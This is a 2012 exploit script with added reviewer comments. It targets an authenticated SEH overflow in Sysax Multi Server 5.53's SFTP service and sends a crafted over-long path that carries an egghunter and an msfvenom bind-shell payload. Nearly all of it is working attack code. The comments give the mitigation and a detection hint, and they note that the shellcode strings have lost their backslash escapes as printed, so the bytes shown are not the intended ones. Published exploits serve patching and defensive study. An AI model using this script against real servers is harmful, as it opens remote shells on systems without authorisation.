
Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit

Posted on 28 February 2012

#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Software Versions Tested: 5.53
#Date Discovered: February 22, 2012
#Vendor Contacted: February 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Version 5.55
#Notes: Offset based on home path length. This exploit works for C:AAAAAAAAAAAAAAAA
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
##########################################################################################################
#
# Reviewer summary (defensive reading of this proof of concept):
#   - The trigger is an over-long *remote path* handed to an authenticated SFTP
#     GET (see `sftp.get(remotepath, ...)` below), so a valid account is a
#     precondition: credential hygiene and auditing of SFTP logins matter here.
#   - The overwritten handler is a pop/pop/ret in a module the author marks as
#     SafeSEH-unprotected (see the `seh` line); the header names 5.55 as the fixed
#     release, so upgrading is the mitigation.
#   - Detection hint: an SFTP path request of well over a kilobyte (256 + 4 + 4 +
#     10 + 32 + 1000 + shellcode + 100 bytes, per `remotepath`) directly after a
#     successful login is anomalous for a file server.
#   - NOTE(review): every "x.." byte string on this page has lost its backslash
#     escapes (presumably in extraction), so as printed they are plain ASCII text,
#     not the intended bytes; they are left exactly as published.
#   - Python 2 syntax (`print` statements); `paramiko` is a third-party dependency.
import paramiko,os,sys

# Usage check: four positional arguments are required.
if len(sys.argv) != 5:
    print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

# Post-auth: a password-authenticated SSH transport is opened first and the
# SFTP subsystem is requested on top of it.
transport = paramiko.Transport((host, port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)

# Payload as published: an egg-tagged ("DNWPDNWP") bind shell generated with
# msfvenom (the comment below is the author's generation command). The tag is
# what the egghunter searches memory for.
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "x00" -e x86/shikata_ga_nai
shell = ("DNWPDNWP"
"xdbxd9xbaxf9x77x28x1bxd9x74x24xf4x5ex29xc9"
"xb1x56x31x56x18x83xeexfcx03x56xedx95xddxe7"
"xe5xd3x1ex18xf5x83x97xfdxc4x91xccx76x74x26"
"x86xdbx74xcdxcaxcfx0fxa3xc2xe0xb8x0ex35xce"
"x39xbfxf9x9cxf9xa1x85xdex2dx02xb7x10x20x43"
"xf0x4dxcax11xa9x1ax78x86xdex5fx40xa7x30xd4"
"xf8xdfx35x2bx8cx55x37x7cx3cxe1x7fx64x37xad"
"x5fx95x94xadx9cxdcx91x06x56xdfx73x57x97xd1"
"xbbx34xa6xddx36x44xeexdaxa8x33x04x19x55x44"
"xdfx63x81xc1xc2xc4x42x71x27xf4x87xe4xacxfa"
"x6cx62xeax1ex73xa7x80x1bxf8x46x47xaaxbax6c"
"x43xf6x19x0cxd2x52xccx31x04x3axb1x97x4exa9"
"xa6xaex0cxa6x0bx9dxaex36x03x96xddx04x8cx0c"
"x4ax25x45x8bx8dx4ax7cx6bx01xb5x7ex8cx0bx72"
"x2axdcx23x53x52xb7xb3x5cx87x18xe4xf2x77xd9"
"x54xb3x27xb1xbex3cx18xa1xc0x96x2fxe5x0exc2"
"x7cx82x72xf4x93x0exfax12xf9xbexaax8dx95x7c"
"x89x05x02x7exfbx39x9bxe8xb3x57x1bx16x44x72"
"x08xbbxecx15xdaxd7x28x07xddxfdx18x4exe6x96"
"xd3x3exa5x07xe3x6ax5dxabx76xf1x9dxa2x6axae"
"xcaxe3x5dxa7x9ex19xc7x11xbcxe3x91x5ax04x38"
"x62x64x85xcdxdex42x95x0bxdexcexc1xc3x89x98"
"xbfxa5x63x6bx69x7cxdfx25xfdxf9x13xf6x7bx06"
"x7ex80x63xb7xd7xd5x9cx78xb0xd1xe5x64x20x1d"
"x3cx2dx50x54x1cx04xf9x31xf5x14x64xc2x20x5a"
"x91x41xc0x23x66x59xa1x26x22xddx5ax5bx3bx88"
"x5cxc8x3cx99")

# Egghunter stub as published (32 bytes once the escapes are restored, which
# this page does not do); it is placed right after the handler overwrite.
egghunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcd"
"x2ex3cx05x5ax74xefxb8x44x4ex57x50"
"x8bxfaxafx75xeaxafx75xe7xffxe7")

# Next-SEH slot: a short jump over the handler address.
nseh = "x90x90xebx08"
# Filler up to the handler record; the header notes the offset depends on the
# configured home-path length (tested against a 16-character one).
junk = "A" * 256
# NOTE(review): `padding` is computed but never used in `remotepath`; with
# len(junk) == 256 it is an empty (or negative-length) string either way.
padding = "B" * (256 -len(junk) - len(shell))
# Handler address: pop/pop/ret gadget; the author flags the hosting module as
# lacking SafeSEH, which is what lets a stack-supplied handler run at all.
seh = "xA1x47x92x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
# Full malicious path: filler, SEH record, small NOP sled, egghunter, large NOP
# sled, then the tagged shellcode. This string is the single attacker-
# controlled input the server mishandles.
remotepath = junk + nseh + seh + "x90" * 10 + egghunter + "x90" * 1000 + shell + "x90" * 100
# Local destination for the GET; never written, since the request is expected
# to crash the server side.
localpath = '/tmp/system.log'

print "============================================================================"
print " Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter) "
print " by cd1zz "
print " www.pwnag3.com "
print " Launching exploit against " + host + " on port " + str(port) + " for XP"
print "============================================================================"

# The over-long remote path is sent as an ordinary authenticated file request.
sftp.get(remotepath, localpath)
sftp.close()
transport.close()

 
